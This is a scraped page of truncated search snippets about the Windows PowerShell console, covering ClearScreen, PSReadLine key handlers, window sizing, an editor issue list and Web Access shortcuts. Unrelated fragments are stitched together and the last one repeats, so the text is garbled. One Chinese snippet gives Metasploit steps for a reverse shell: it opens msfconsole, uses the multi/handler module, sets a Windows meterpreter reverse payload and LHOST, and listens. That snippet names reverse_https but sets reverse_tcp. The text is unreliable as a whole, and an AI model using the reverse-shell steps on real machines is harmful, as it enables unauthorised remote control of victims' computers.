Clear the screen and draw the current line at the top of the screen. C# 复制 public static void ClearScreen (ConsoleKeyInfo? key = default, object arg = default); Parameters key Nullable<ConsoleKeyInfo> arg Object Applies to 产品版本 Windows PowerShell ...
接下来,我们在Kali中使用reverse_https模块进行反弹shell。 第一步,打开msfconsole。 msfconsole 第二步,在msf设置 windows/x64/meterpreter/reverse_https 模块进行反弹并开启监听。 use exploit/multi/handler使用监听模块 set payload windows/x64/meterpreter/reverse_tcp设置payload set LHOST设置本机...
RuntimeVersion : v2.0.50727 ConsoleHostAssemblyName : Microsoft.PowerShell.ConsoleHost, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil ConsoleHostModuleName : C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll PowerShellVersion...
[Microsoft.PowerShell.PSConsoleReadLine]::AddToHistory($line) # RevertLine is like pressing Escape. [Microsoft.PowerShell.PSConsoleReadLine]::RevertLine() } } Set-PSReadLineKeyHandler @parameters You can see many more examples in the file SamplePSReadLineProfile.ps1 which is installed in the P...
000. Size the window height so that you can view more of the Windows PowerShell window at one time. A good setting is 60 lines on screens set to 1280 1024 resolution with a 12-point font. If you want the PowerShell window to be in a specific screen position, clear Let ...
Keboard shortct Ctrl + L does not work in integrated console to clear screen#634 Closed This was referencedApr 7, 2017 Ctrl + Shift + <ArrowKey> does not work in new IntegratedTerminal#545 Closed Cursor navigation only one letter at a time within PowerShell Integrated Console#666 ...
for automation (e.g. via AutoHotkey/Jenkins or on startup/login/logoff/daily/shutdown/etc.), for context menus, for voice commands (seetalk2windows), or simply to learn PowerShell. All scripts are located in the 📂scriptssubfolder and support Unicode - a modern console likeWindows Termina...
Well for starters, the console window uses non-proportionally spaced fonts (that is, the lowercase i takes up exactly the same amount of screen real estate as the uppercase M). That makes it difficult to display very much information across the width of the window. Likewise, bu...
In Windows PowerShell Web Access,Ctrl+Cis used by the browser to copy content. The console offers aCancelbutton, and users can also useCtrl+Qto cancel commands. Alt-space, e, l Scroll through the screen buffer Alt+Space, e, f
In Windows PowerShell Web Access,Ctrl+Cis used by the browser to copy content. The console offers aCancelbutton, and users can also useCtrl+Qto cancel commands. Alt-space, e, l Scroll through the screen buffer Alt+Space, e, f